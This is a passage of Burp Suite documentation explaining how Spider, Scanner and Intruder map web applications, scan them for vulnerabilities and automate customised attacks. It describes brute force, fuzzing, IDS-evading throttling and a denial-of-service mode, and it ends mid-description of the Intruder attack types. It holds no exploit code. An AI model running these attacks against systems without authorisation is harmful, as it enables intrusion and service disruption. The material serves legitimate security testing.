Burp Proxy is extensible via the IBurpExtender interface. This allows third-party developers to extend the functionality of Burp Suite by creating implementations of the interface which will be dynamically loaded and executed. The processProxyMessage() method of this interface allows implementations to receive full details of every request and response, to perform logging functions, modify the message, specify an action (intercept, drop, etc) and perform any other arbitrary processing. See the source code and Javadoc for the interface for more details. What is Burp Spider?

Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application's content and functionality.

Burp Spider maps a target application by following hyperlinks found within HTML and JavaScript, submitting forms, and using other clues such as directory listings, source code comments and the robots.txt file. Results are displayed in the target site map in both tree and table format, providing a clear and highly detailed view of the target application.

Burp Spider enables you to obtain a detailed understanding of how a web application works, avoiding the time-consuming and unreliable task of manually following links, submitting forms and scouring HTML source code. Potentially vulnerable application functions can be quickly identified, allowing you to check for specific vulnerabilities such as SQL injection and directory traversal.

Using Burp Spider

To use Burp Spider against an application requires two simple steps:

1. With your browser configured to use Burp Proxy as its proxy server, browse to the target application. (You can turn off interception within the Proxy, to save time.) 2. Go to the site map in the "target" tab, and select the host(s) and directories where the target application resides. Choose the "spider this host/branch" option from the context menu. You can also choose "spider this item" from the context menu on any request or response within any of the Burp tools.

When you send a branch of the site map for spidering, the Spider will first check if that branch is within the currently defined spidering scope. If not, Burp will prompt you to confirm that you want to add the relevant URLs to the scope. Burp will then start spidering, and will perform the following actions:

 Request any unrequested URLs already discovered within the branch.  Submit any discovered forms whose action URLs lie within the branch.  Re-request any items in the branch which previously returned 304 status codes, to retrieve a fresh (uncached) copy of the application's responses.  Parse all content retrieved to identify new URLs and forms.  Recursively repeat these steps as new content is discovered.  Continue spidering all in-scope areas until no new content is discovered.

Note that the Spider will follow links for any URLs that are within the currently defined spidering scope. If you have already defined a wider target scope, and you select an individual branch within this for spidering, then the Spider will follow any links into the wider target scope, and so will spider outside of the selected branch. To ensure that the Spider only requests items within a specific branch, you should first configure the spidering scope to include only this branch. You should use Burp Spider with caution. In its default configuration, the Spider will automatically submit any forms within the spidering scope using default input values, and will request various URLs that normal users would not ordinarily request if using only a browser. If any URLs within your defined scope are used to perform sensitive actions, then these actions may actually be carried out within the application. It is normally preferable to perform some manual mapping of the application using your browser before initiating any fully automated content discovery.

Control tab

This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.

Spider running - This is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy, and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted. The display also shows some metrics about the Spider's progress, enabling you to see the size of the in-scope content and the work remaining to fully spider it.

Clear queues - If you want to reprioritise your work, you can completely clear the currently queued items, so that other items can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider's parser encounters new links to the items.

Spider scope - This panel lets you define exactly what is in-scope for the Spider to request. If you have already configured the Suite-widetarget scope with details of your current target, then you can normally leave the default setting, which is to use the Suite-wide scope to define the Spider's activities. If you need to define a different scope for the Spider to use, then select "use custom scope". A further configuration panel will appear which functions in the same way as the Suite-wide scope panel. If you have selected to use a custom scope and you send any out-of-scope items to the Spider, then Burp will automatically update this custom scope, rather than the Suite scope.

Options tab

This tab contains various configuration options which control the behaviour of Burp Spider, as described below. These settings can be modified after the Spider has started running, and will be applied retrospectively to prior results. For example, if the maximum link depth is increased, then links which were previously outside the maximum depth will be queued to be requested if appropriate.

check robots.txt - If checked, Burp Spider will request and process the robots.txt file from all in-scope domains. This file is used by therobots exclusion protocol to control the behaviour of spider-like agents on the Internet. Note that Burp Spider does not confirm to the robots exclusion protocol. Because Burp Spider is designed to comprehensively enumerate a target application's content, all entries in robots.txt will be requested if they are in-scope. use cookies - If checked, Burp Spider will process Set-Cookie instructions in server responses, and will submit any received cookies in subsequent requests to the same domain. This option is normally necessary when spidering web applications which persist any kind of state in a server-side session. detect custom "not found" responses - The HTTP protocol requires web servers to return a 404 status code if a requested resource is not found. However, many web applications return customised "not found" pages that use a different status code. If this is the case, then using this option can prevent false positives in the mapping of site content. Burp Spider detects custom "not found" responses by requesting several nonexistent resources from each domain, and compiling a fingerprint with which to diagnose "not found" responses to other requests. ignore links to non-text content - It is often possible to deduce the MIME type of a particular resource from the HTML context in which links to it appear. For example, URLs within IMG tags will probably return images; those within SCRIPT tags will probably return JavaScript. If this option is checked, the Spider will not request items which appear, from this context, to be non-text media resources. Using this option can reduce spidering time with minimal risk of overlooking interesting content as a result. request the root of all directories - If checked, Burp Spider will request all identified web directories within the target scope, in addition to files within those directories. This option is particularly useful if directory indexing is available on the target site. make a non-parameterised request to each dynamic page - If checked, Burp Spider will make a non-parameterised GET request to all in-scope form action URLs. Dynamic pages usually respond differently if the expected parameters are not received, and this option may successfully detect additional site content and functionality. maximum link depth - This is the maximum number of "hops" which Burp Spider will navigate from any seed URL. A value of zero will cause Burp Spider to request seed URLs only. If a very large number is specified, then in-scope links will be followed effectively indefinitely. These options control the interface between Burp Proxy and Burp Spider, which allows "passive" spidering of web applications, controlled through your browser. passively spider as you browse - If checked, Burp Spider will process all HTTP requests made through Burp Proxy, to identify links and forms on web pages visited. Using this option can enable Burp Spider to build up a detailed picture of an application's contents even when you have only browsed a subset of that content with your browser, because all content that is linked from visited content is automatically added to the Suite site map. link depth to associate with proxy requests - This option controls the "link depth" which will be associated with web pages accessed through Burp Proxy. To prevent Burp Spider following any links in these pages (even when the Spider is running and these links are in-scope) set a higher value for this option than the "maximum link depth" option above.

Note: Earlier versions of Burp Spider contained options here to control how the Spider cookie jar was updated based on cookies in Proxy requests and responses. These configurations have now been removed, and you should use the suite-wide session handling supportinstead. individuate forms - This option configures the criteria for individuating unique forms (action URL, method, fields, values). When Burp Spider processes each form, it will check these criteria to determine if the form is "new". Forms which are not new will not be queued for submission. do not submit - If selected, Burp Spider will not submit any forms. prompt for guidance - If selected, Burp Spider will prompt you for guidance before submitting each identified form. This allows you to enter custom data into form input fields as required, and choose which submit fields to send to the server, or whether to iterate through all submit fields. automatically submit - If selected, Burp Spider will automatically submit any in-scope forms using the defined rules to fill out the values of text input fields. Each rule lets you specify a simple or regular expression to match on form field names, and the value to submit in fields whose names match the expression. A default value can be specified for any unmatched fields. This option is particularly useful if you want to automatically spider through registration forms and similar functions, where applications typically require data in a valid format for each input field. Burp comes with a set of default rules that have proven successful when automatically submitting form data to a wide range of applications. Of course, you can modify these or add your own rules if you encounter form field names that you want to submit specific values in. You should use this option with caution, as submitting bogus values in forms may sometimes result in undesirable actions.

Many forms contain multiple SUBMIT elements, which result in different actions within the application, and the discovery of different content. You can configure the Spider to iterate through the values of all submit elements within forms, submitting each form multiple times up to a configurable maximum.

Login forms play a particular role within applications, and you will often want Burp to handle these in a different way than ordinary forms. Using this configuration, you can tell the Spider to perform one of four different actions when a login form is encountered:

 Burp can ignore the login form, if you don't have credentials, or are concerned about spidering sensitive protected functionality.  Burp can prompt you for guidance interactively, enabling you to specify credentials on a case-by-case basis. This is the default option.  Burp can handle login forms in the same way as any other form, using the configuration and auto-fill rules you have configured for those.  Burp can automatically submit specific credentials in every login form that is encountered. In the last case, any time Burp encounters a form containing a password field, it will submit your configured password in that field, and will submit your configured username in the text input field whose name most looks like a username field. If you have credentials for an application, and want to let the Spider handle the login for you, then this is normally the best option.

These options let you fine-tune the spidering engine, depending on the performance impact on the application, and on your own processing power and bandwidth. If you find that the Spider is running slowly, but the application is performing well and your own CPU utilisation is low, you can increase the number of scan threads to make your scans proceed faster. If you find that connection errors are occurring, that the application is slowing down, or that your own computer is locking up, you should reduce the thread count, and maybe increase the number of retries on network failure and the pause between retries.

Request headers - This section allows customised HTTP headers to be configured which will be used in all requests. This may be useful to meet specific requirements of individual applications - e.g. to emulate an expected user agent when testing applications designed for mobile devices. use Referer header - If checked, Burp Spider will submit the relevant Referer header when requesting any item that was linked to from another page.

Spider results

All of the content discovered during spidering is added to the target site map that is shared between Suite components. This map shows tree and table views of the content discovered via the Spider and Proxy. It lets you filter from view any items you are not interested in, and perform numerous other actions such as initiating vulnerability scans and further spidering, and sending individual requests to other Burp tools to perform customised attacks. Please consult the site map help for further details. What is Burp Scanner?

Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi- automated penetration tests of web applications.

Using most web scanners is a detached exercise: you provide a start URL, click "go", and watch a progress bar update until the scan is finished and a report is produced. Using Burp Scanner is very different, and is much more tightly integrated with the actions you are already carrying out when attacking an application, giving you fine- grained control over each request that gets scanned, and direct feedback about the results.

Burp Scanner can perform two types of scans:

 Active scanning - The scanner sends various crafted requests to the application, derived from a base request, and analyses the resulting responses looking for vulnerable behaviour.  Passive scanning - The scanner doesn't send any new requests of its own; it merely analyses the contents of existing requests and responses, and deduces vulnerabilities from those.

You can initiate scans against your target application in two different ways:

 Manual scanning - You can send one or more requests from other Burp tools, to perform active or passive scans against those specific requests.  Live scanning as you browse - You can configure the Scanner to automatically perform active or passive scans against requests passing through the Proxy as you are browsing the application.

This approach to automated vulnerability detection brings a number of benefits to the penetration tester:

 Being able to perform quick and reliable scans for many common vulnerabilities on a per-request basis can hugely reduce your testing effort, enabling you to direct your human expertise towards vulnerabilities whose detection cannot be reliably automated.  Results from each type of scan are displayed immediately, and can directly inform your other testing actions in relation to the individual requests involved.  Burp avoids a frustrating problem with other scanners, in which a monolithic automated scan takes an age to complete, with little assurance over whether the scan has worked, or whether it encountered problems that impacted on its effectiveness.

By controlling exactly what gets scanned, and by monitoring in real time both the scan results and the wider effects on the application, Burp Scanner lets you combine the virtues of reliable automation with intuitive human intelligence, often with devastating results.

Active scanning

In this mode of scanning, Burp takes an individual request to the application, called the "base request", and modifies it in various ways designed to trigger behaviour that indicates the presence of various vulnerabilities. These modified requests are sent to the application, and the resulting responses are analysed. In many cases, further requests will be sent, based on the results of the initial probes.

This mode of operation generates large numbers of requests which are malicious in form and which may result in compromise of the application. You should use this scanning mode with caution, only with the explicit permission of the application owner, and having warned them of the possible effects which automated scanning may have on the application and its data. If possible, scanning should be performed against non- production systems, and full backups performed prior to scanning.

There are various well-known limitations on the types of vulnerabilities within web applications whose detection can be reliably automated. Burp's active scanning capabilities were designed to focus on the kind of input-based bugs that scanners can reliably look for. By avoiding the false positives that arise in other areas, Burp gives you confidence in its output, leaving you to focus on the aspects of the job that require human experience and intelligence to deliver.

The issues that Burp's active scanning is able to identify mostly fall into two categories:

1. Input-based vulnerabilities targeting the client side, such as cross-site scripting, HTTP header injection, and open redirection. 2. Input-based vulnerabilities targeting the server side, such as SQL injection, OS command injection, and file path traversal.

Issues in category 1 can be detected with a very high degree of reliability. In most cases, everything that is relevant to finding the bug is visible on the client side. For example, to detect reflected XSS, Burp Scanner submits some benign input in each entry point to the application, and looks for this being echoed in responses. If it is echoed, Burp then parses the response content to determine the context(s) in which the echoed input appears. It then supplies various modified inputs to determine whether strings that constitute an attack in those contexts are also echoed. Burp Scanner has knowledge of the wide range of broken input filters, and associated bypasses, that arise with web applications, and it checks for all that apply to the context. By implementing a full decision tree of checks, driven by feedback from preceding checks, Burp effectively emulates the actions that a skilled and methodical human tester would perform. The only bugs that Burp should miss are those with some unusual feature requiring intelligence to understand, such as a custom scheme for encapsulating inputs.

Issues in category 2 are inherently less amenable to automated detection, because in many cases the behaviours that are relevant to identifying the bugs occur only on the server, with little manifestation on the client side. For example, SQL injection bugs may return verbose database errors in responses, or they may be fully blind. Burp Scanner employs various techniques to identify blind server-side injection issues, by inducing time delays, changing Boolean conditions and performing fuzzy response diffing, etc. These techniques are inherently more error prone than the methods that are available in category 1. Nevertheless, Burp Scanner achieves a high success rate in this area, reliably reporting numerous kind of issue that are difficult or laborious for a human tester to diagnose.

Passive scanning

In this mode of scanning, Burp doesn't send any new requests to the application - it merely analyses the contents of existing requests and responses, and deduces vulnerabilities from those. This mode of operation can be used safely and legally in any situation in which you are authorised to access the application.

Burp Scanner is able to identify numerous kind of vulnerabilities using solely passive techniques, including:

 Clear-text submission of passwords.  Insecure cookie attributes, like missing HttpOnly and secure flags.  Liberal cookie scope.  Cross-domain script includes and Referer leakage.  Forms with autocomplete enabled.  Caching of SSL-protected content.  Directory listings.  Submitted passwords returned in later responses.  Insecure transmission of session tokens.  Leakage of information like internal IP addresses, email addresses, stack traces, etc.  Insecure ViewState configuration.  Ambiguous, incomplete, incorrect or non-standard Content-type directives.

Many of these issues are relatively unexciting, and recording them is dull and repetitive for a human. But as penetration testers we are obliged to report them. Having Burp Scanner reliably mop up these issues as you browse an application is a time and sanity saver.

Being able to carry out passive-only vulnerability scanning is beneficial in a range of situations:

 Because passive scans don't send any new requests to the application, you can perform them safely against critical production applications where you want total control of every request that you send.  Some applications are aggressive in reacting to attacks, by terminating your session or locking your account every time an apparently malicious request is received. In this situation, you may be restricted to piecemeal manual testing, but you can still use passive scanning to identify various kinds of issues without causing any problems.  If you don't (yet) have authorisation to attack a target, you can use passive scanning to identify vulnerabilities purely by browsing the application as a normal user. For example, if you are proposing for a new penetration testing engagement, you can passively scan your target to get a feel for its security posture, and hopefully get some reportable issues in the bag before you even begin the official testing.

Initiating scans

Manual scanning

From anywhere within Burp Suite, you can select one or more HTTP requests, and send these to the Scanner to perform active or passive scanning. For example, if you intercept an interesting request using Burp Proxy, you can initiate a scan against just this request using the context menu: Similarly, you can select sets of requests from within the Target site map or Proxy history, and send these in bulk to the Scanner. So, after browsing around an application and building up a comprehensive map of its content, you can tell Burp to scan specific areas of the application's functionality: If you select multiple items and send these for active scanning, Burp launches a brief wizard which lets you fine-tune your selection. The first screen of the wizard offers you various intuitive filters to remove potentially unnecessary items (duplicates, already scanned items, media content, etc.), and shows you how many items will be affected by each filter: The second screen of the wizard shows you a list of the remaining items, and lets you sort the table by various relevant properties, view the full requests and responses, and delete individual items: The wizard then completes and the selected items are sent for scanning in the usual way.

Live scanning

A further way to initiate scans is to use the "live scanning" feature. In this mode, you tell Burp what your target scope is for active and passive scanning, and it will automatically initiate active or passive scans against relevant requests as you use the application. When operating in this mode, you simply need to browse around the application as a normal user, to show Burp where the application's content and functionality are, and it will work away in the background to find vulnerabilities for you.

When using live scanning, you have fine-grained control over the requests that Burp will automatically scan. If you have already configured a suite-wide target scope for your current work, then you can simply tell Burp to scan every request that falls within that scope. Alternatively, you can define a custom scope to use for active and passive scanning. In the example below, Burp has been configured to actively scan every request that is made to www.myapp.com, with the exception of login requests, and to passively scan every request that is made to any destination whatsoever: Note that the live scanning feature ignores requests for media resources (images, etc.) where the request does not contain any non-cookie parameters. Requests like these are virtually always for static resources which do not have any security significance, and so can be safely ignored by the scanner. (This does not apply to manual scanning - if you manually select items like these and send them for active scanning, then they will of course be scanned in the normal way.)

Active scan queue

When you send requests for passive scanning, these are processed immediately. Because active scans involve sending large numbers of requests to the server, requests sent for active scanning may be queued up. A typical request with a dozen parameters will be scanned in a minute or two, and the scan queue is processed by a configurable thread pool, so the number of waiting items rarely grows very large. As each item is scanned, the scan queue table indicates its progress - the number of requests made, the percentage complete, and the number of vulnerabilities identified. This last value is colourised according to the significance and confidence attached to the most serious issue: You can double-click any item in the scan queue to display the issues identified so far, and view the base request and response for that item: You can use the context menu on the scan queue to perform various actions:

 Show the details of the selected item.  Cancel the selected item(s).  Scan the selected item(s) again.  Pause or resume the scanner.

Used in the ways described, Burp Scanner gives you fine-grained control over everything that it does, and integrates closely with your other testing activities. It lets you prioritise areas of an application that interest you, by browsing them using live scanning, or selecting them for scanning from the site map. And it provides immediate feedback about those areas to inform your manual testing actions.

Reviewing results

In addition to the per-request view of discovered issues shown above, Burp Scanner maintains a central record of all the issues it has discovered, organised in a tree view of the target application's site map. Selecting a host or folder in the tree shows a listing of all the issues identified for that branch of the site: Where multiple issues have been found of the same type, these are aggregated into a single item in the top-right panel. You can expand the aggregated item to view each individual instance of the issue. Selecting an issue in the top-right panel shows the full detail for that issue in the bottom-right panel. This includes a customised vulnerability advisory, and the full requests and responses that are relevant to understanding and reproducing the issue.

The advisory includes a standard description of the issue and its remediation, and also a description of any specific features that apply to the issue and affect its remediation. In the example above, the cross-site scripting advisory tells us:

 The request parameter in which the attack input is supplied (SearchTerm).  The synactic context in which the input is returned in the response (within a piece of JavaScript, in a single-quote-delimited string).  That the application escapes any single quote characters in our input, but fails to escape the backslash, allowing us to circumvent the filter.  The exact proof-of-concept payload which Burp submitted to the application, and the form in which this payload was returned.  That the original request used the POST method, and Burp was able to convert this to a GET request to facilitate demonstration and exploitation of the issue.

Every issue that Burp Scanner reports is given a rating both for severity (high, medium, low, informational) and for confidence (certain, firm, tentative). When an issue has been identified using a less reliable technique, Burp makes you aware of this, by dropping the confidence level.

Alongside the advisory, Burp shows the requests and responses that were used to identify the issue, with relevant portions highlighted. You can review these to see how Burp identified the issue, and quickly understand the nature of the vulnerability. You can also send the request directly to other tools to manually verify the issue, or fine- tune the proof-of-concept attack that was generated by Burp: Within the list of scan issues, you can modify the severity and confidence levels of individual or multiple issues (via the context menu), or delete issues altogether (via the context menu or using the 'del' key).

Note that if you delete an issue, and Burp rediscovers the same issue (for example, if you rescan the same request), the issue will be reported again. If instead you mark the issue as a false positive, then this will not happen. Therefore, deletion of issues is best used for cleaning up the Results tree to remove hosts or paths you are not interested in. For unwanted issues within the functionality you are still working on, you should use the false positive flag.

Scan optimisation

Burp Scanner gives you detailed information in real time about all of the actions it is performing. In the scan queue, you can monitor the progress of each individual base request that is being scanned. The table shows you the number of "insertion points" where Burp is placing payloads, and the number of attack requests that have been generated. (The latter is not a linear function of the former - observed application behaviour feeds back into subsequent attack requests, just as it would for a human tester.)

This information lets you quickly see whether any of your scans are progressing too slowly, and understand the reasons why. Given this information, you can then take action to optimise your scans. Within the scan queue, there is a context menu which lets you cancel or re-prioritise individual items. Within the Options tab, you can also optimise the scanner configuration based on what you have learnt about the application, using the options described below.

Attack insertion points

A key factor in the speed and effectiveness of scans is the selection of attack insertion points. Burp gives you fine-grained control over the locations within the base request where attack payloads will be placed, using the following configuration options:

The checkboxes let you define which locations within HTTP requests will have attacks placed into them:

 The values of URL, body and cookie parameters.  Parameter name - if selected, Burp adds an additional parameter to the request and places attacks into the name of this parameter, often detecting unusual bugs that are missed if only parameter values are tested.  HTTP headers - if selected, Burp places attacks into the User-Agent and Referer headers, often detecting issues like SQL injection or persistent XSS within logging functionality.  AMF string parameters - For requests in Action Message Format, Burp places attacks into any string-based data types within the message.  REST-style URL parameters - if selected, Burp places attacks into each directory or file name within the path portion of the URL.

You can also set a limit on the number of insertion points that Burp will attack within each base request. Occasionally, HTML forms may contain an excessive number of fields (hundreds, or more). If Burp performed a full vulnerability scan of every field, the scan would take an excessive amount of time to complete. Setting a limit on insertion points prevents your scans from becoming stalled if they encounter forms with huge numbers of parameters. When this limit is applied, the item's entry in the scan queue will indicate the number of insertion points that were skipped, enabling you to manually review the base request and decide if it is worth performing a full vulnerability scan of all its possible entry points.

You can tell Burp to use "intelligent attack selection". This option causes Burp to perform or omit each type of server-side check based on the base value of each attack insertion point. For example, if a parameter's value contains characters that don't normally appear in filenames, Burp will skip file path traversal checks for this parameter. Using this option can considerably speed up your scans, with minimal risk of missing actual vulnerabilities that exist.

The insertion point configuration lets you specify request parameters for which Burp should skip server-side injection checks. These checks are relatively time-consuming, because Burp sends multiple requests probing for various blind vulnerabilities on the server. If you believe that certain parameters appearing within requests are not vulnerable (for example, built-in parameters used only by the platform or web server), you can tell Burp not to test these. (Note that client-side checks like cross-site scripting are always performed because testing each request parameter imposes minimal overhead on the duration of the scan if the parameter is non-vulnerable.)

You can identify REST parameters by their position (slash-delimited) within the URL path, as well as by their value. To do this, select "REST parameter" from the parameter drop-down, "name" from the item drop-down, and specify the index number (1-based) of the position within the URL path which you wish to exclude from testing. You can also configure any parameters for which Burp should not perform any checks whatsoever.

It is possible to specify fully customisable attack insertion points for active scanning, so you can specify arbitrary locations within a base request where attack strings should be placed. To use this function, send the relevant base request to Intruder, use the payload positions UI to define the start/end of each insertion point in the usual way, and select the Intruder menu option "actively scan defined insertion points".

Active scanning engine

These options let you fine-tune Burp's scan engine, depending on the performance impact on the application, and on your own processing power and bandwidth. If you find that your scans are running slowly, but the application is performing well and your own CPU utilisation is low, you can increase the number of scan threads to make your scans proceed faster. If you find that connection errors are occurring, that the application is slowing down, or that your own computer is locking up, you should reduce the thread count, and maybe increase the number of retries on network failure and the pause between retries. If the functionality of the application is such that actions performed on one base request interfere with the responses returned from other requests, you should consider reducing the thread count to 1, to ensure that only a single base request is scanned at a time.

If you wish to avoid overloading the application, or to remain stealthy from a network perspective, you can use the throttle settings to add fixed or random intervals between requests.

You can configure whether the scanner should follow redirections where this is necessary to identify certain vulnerabilities (for example echoed input or a database error message which is only displayed when a redirect is followed).

Because some applications issue redirects to third-party URLs which include parameter values that you have submitted, Burp protects you against inadvertently attacking third-party applications, by not following just any redirection which is received. If the request being scanned is within the defined target scope (i.e. you are using target scope to control what gets scanned), then Burp will only follow redirects that are within that scope. If the request being scanned is not in scope (i.e. you have manually initiated a scan of an out-of-scope request), Burp will only follow redirects which (a) are to the same host/port as the request being scanned; and (b) are not explicitly covered by a scope exclusion rule (e.g. "logout.aspx").

Active scanning areas

These options let you define which checks are performed during active scanning. Each check that is performed increases the number of requests made, and the overall time of each scan. You can turn individual checks on or off, based on your knowledge of an application's technologies, or on how rigorous you require your scans to be. For example, if you know that an application does not use any LDAP, you can turn off LDAP injection tests. Or you can configure Burp to do a quick once-over of an application, checking only for XSS and SQL injection in URL and body parameters, before returning later to carry out more comprehensive testing of every vulnerability type in every insertion point. Passive scanning areas

Passive scans do not send any requests of their own, and each passive check imposes a negligible processing load on your computer. Nevertheless, you can disable individual areas of checks if you are simply not interested in them and don't want them appearing within scan results.

Reporting

When you have finished testing, you can export a report of all or selected issues in HTML format. To do this, select the desired issues from the aggregated results display (you can multi-select individual hosts, folders, issues, etc.) and select "report issues" from the context menu. The reporting wizard lets you choose various options for your report, including:

 The reporting format (screen- or printer-friendly).  The level of issue description and remediation to include.  Whether to show request and response details in full, or as extracts, or not at all.  The categories of discovered issues to include or exclude.  Whether to organise issues by type, severity or URL.  Report title, heading levels, etc.

The report for the cross-site scripting vulnerability shown previously, with all detail turned on, and showing extracts of application responses in printer-friendly format, looks like this:

You can also report issues in XML format, to enable easy integration with other tools. The XML has a flat structure, and contains a list of issues, with meta-information about issue type, URL, etc., reported within each issue element. The (internal) DTD looks like this:

]>

The serialNumber element contains a long integer that is unique to that individual issue. If you export issues several times from the same instance of Burp, you can use the serial number to identify incrementally new issues.

The type element contains an integer which uniquely identifies the type of finding (SQL injection, XSS, etc.). This value is stable across different instances and builds of Burp.

The name element contains the corresponding descriptive name for the issue type.

The path element contains the URL for the issue (excluding query string).

The location element includes both the URL and a description of the entry point for the attack, where relevant (a specific URL parameter, request header, etc.).

The other elements, some of which are optional and can be selected by the user within the reporting wizard, are hopefully self-explanatory. What is Burp Intruder?

Burp Intruder is a tool for automating customised attacks against web applications.

Burp Intruder is not a point-and-click tool. To use it effectively you need to understand how the target application functions, and have some knowledge of the HTTP protocol. Before launching any attacks using Burp Intruder, you need to investigate the functionality and structure of the target application, and in particular the various HTTP messages that pass between the browser and server. You can perform this investigation using a standard browser and Burp Proxy to intercept and view all of the requests and responses generated by the application. When you have identified some interesting HTTP requests that bear closer examination, you are ready to use Burp Intruder.

Burp Intruder is highly configurable and can be used to automate a wide range of attacks. You can use Burp Intruder to facilitate very many kinds of tasks, including enumerating identifiers, harvesting useful data, and fuzzing for vulnerabilities. The types of attacks that are appropriate will depend on the application in question, and may include: testing for flaws such as SQL injection, cross-site scripting, buffer overflows and path traversal; brute force attacks against authentication schemes; enumeration; parameter manipulation; trawling for hidden content and functionality; session token sequencing and session hijacking; data mining; concurrency attacks; and application-layer denial-of-service attacks. For a detailed discussion of the kinds of attack that can be performed using Burp Intruder, see Chapter 13 of The Web Application Hacker's Handbook. Burp Intruder includes many preset lists of attack "payloads" (strings that are useful in detecting and exploiting common vulnerabilities). It also contains a large number of tools for dynamically generating attack vectors that are appropriate to specific mechanisms often found within web applications. External files can also be loaded and incorporated into Burp Intruder (e.g. lists of enumerated usernames, or fuzz strings for newly-identified vulnerabilities).

The core activity of each attack is to iterate through a number of HTTP requests. These are derived from the basic request identified at the investigation stage. Burp Intruder manipulates this basic request in particular ways designed to identify or exploit application vulnerabilities. It does this by replacing portions of the basic request with one or more payloads. The timing and execution of each attack can also be configured. Multiple threads can be used to generate requests concurrently. Requests can be throttled to prevent IDS detection. A denial-of-service mode can be used to bombard the server with requests while ignoring any responses received.

When an attack executes, a detailed table of results is produced, showing the response received from the server to each request. The results contain all relevant information that can be used to pinpoint responses that are interesting or successful. In addition to the standard results common to every attack, many customisable tests can be performed on the results at runtime, and the results of these are also recorded. For example, Burp Intruder can be configured to extract specific information from HTML pages (e.g. the personal details fields on a user information page), and record this information with each result. All results output can be exported for further manipulation, or to use as an input file for further attacks or other tools.

Burp Intruder is a Java application, and runs on any platform for which a Java Runtime Environment is available. It requires version 1.5 or later. The JRE can be obtained for free from java.sun.com.

Configuring Burp Intruder

The Burp Intruder control panel let you configure one or more attacks simultaneously, in their own numbered tabs. You can create a new tab, or rename existing tabs using the Intruder menu.

The configuration of each individual attack is carried out in a number of sub-tabs (target, positions, payloads, options). The easiest way to create a new attack is to locate the relevant base request within another Burp tool (such as the proxy history or site map), and choose "send to intruder" from the context menu. This will populate the target and positions tabs with the relevant details. You can use the Intruder menu to control how the payloads and options tabs are set up when you create a new attack tab. You can choose to use the default attack configuration, copy the configuration from the first attack tab, or copy from the last attack tab. In this way, you can set up a standard attack configuration in your first attack tab (e.g. for fuzzing all parameters and grepping for error messages) and have this configuration copied into each new attack which you send to intruder. You can also copy attack configurations between arbitrary tabs, or save and load attack configurations, using the Intruder menu.

To start an attack, set up the required configuration and then select "start attack" from the Intruder menu. The configuration options are described in detail in the sections below.

To load a saved attack, select "open saved attack" from the Intruder menu, and choose the required file [Pro version].

Target tab

This tab is used to configure the details of the target server: The "host" field is used to specify the IP address or hostname of the target server. The "port" field is used to specify the port number of the HTTP/S service. The "use SSL" box is used to specify whether Secure Sockets Layer connections should be used.

Positions tab

This tab is used to configure the template for all the HTTP requests generated in the attack:

The main text editor is used to set the contents of the base request, and also to mark the locations where payloads will be inserted into individual HTTP requests during the attack. There is a context menu providing access to various functions. The easiest way to set up the attack template is to locate the relevant request within one of the other Burp tools, and select the "send to intruder" option. You can send requests from any place within Burp Suite where an HTTP request or response is displayed, and also from the Burp Proxy history, site map tree or table, and from within an already executing Burp Intruder attack:

The positions of payloads are marked using pairs of § characters, which may enclose portions of the template text between them. When a payload is placed into a particular position for a given request, the § characters for that position, and any text which appears between them, are replaced with the payload. When a particular position is not assigned a payload for a given request (this applies only to the "sniper" attack type - see below), the § characters for that position are simply removed, and any text which appears between them remains unchanged.

When you send a request from elsewhere within Burp Suite, Burp Intruder makes a best guess at where you are likely to want to place payloads, and it positions these at the value of each URL and body parameter, and each cookie. The markers and enclosed text for each position are automatically highlighted for clarity. You can use the option on the Intruder menu to control whether payload markers are positioned so as to replace or append the existing parameter values. Above the request editor, the number of defined positions and the size of the template text are indicated.

You can also use the buttons on this tab to control the positioning of payload markers:

 add § - This inserts a single position marker at the cursor position.  clear § - This removes all position markers, either from the entire template or from a selected portion of the template.  auto § - This makes a guess as to where it might be useful to position payloads and inserts position markers accordingly, either for the entire template or for a selected portion of the template. Any existing markers are removed. This is a useful function to quickly mark positions suitable for attacking certain common vulnerabilities (such as SQL injection), but manual positioning is required for more customised attacks.  refresh - This refreshes the colour-coding of the editor, if necessary.  clear - This deletes the entire contents of the editor.

Note that automatic placement of payload positions recognises XML-formatted data within the currently-selected range of the request template. Some applications send XML-encapsulated data within a multipart request body, for example:

POST /function HTTP/1.0

Content-Type: multipart/form-data; boundary=weidhwiderfhwiuehwiuehfwerrf

Content-Length: 202

--weidhwiderfhwiuehwiuehfwerrf

Content-Disposition: form-data; name="data"

foo bar

123

--weidhwiderfhwiuehwiuehfwerrf--

If you perform auto-placement of payload positions on the entire message, then Intruder will mark the whole of the XML block as a single insertion point, which is probably not what you want. Instead, if you manually select the exact XML block, then the auto-placement function will recognise that the selection contains XML, and will mark the individual XML parameter values as insertion points.

The "attack type" drop-down menu is used to define a key aspect of the behaviour of Burp Intruder - the way in which payloads are placed into the specified positions to form individual requests. The four possible attack types are described below:

 sniper - This uses a single set of payloads. It targets each position in turn, and inserts each payload into that position in turn. Positions which are not targeted during a given request are not affected - the position markers are removed and any text which appears between them in the template remains unchanged. This attack type is useful for testing a number of data fields individually for a common vulnerability (e.g. cross- site scripting). The total number of requests generated in the attack is the product of the number of positions and the number of payloads in the payload set.  battering ram - This uses a single set of payloads. It iterates through the payloads, and inserts the same payload into all of the defined positions at once. This attack type is useful where an attack requires the same input to be inserted in multiple places within the HTTP request (e.g. a username within the Cookie header and within the message body). The total number of requests generated in the attack is the number of payloads in the payload set.  pitchfork - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through all payload sets simultaneously, and inserts one payload into each defined position. I.e., the first request will insert the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2; the second request will insert the second payload from payload set 1 into position 1 and the second payload from payload set 2 into position 2, etc. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the HTTP request (e.g. a username in one data field, and a known ID number corresponding to that username in another data field). The total number of requests generated by the attack is the number of payloads in the smallest payload set.  cluster bomb - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 8). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. I.e., if there are two payload positions, the attack will place the first payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it will then place the second payload from payload set 1 into position 1, and iterate through all the payloads in payload set 2 in position 2. This attack type is useful where an attack requires 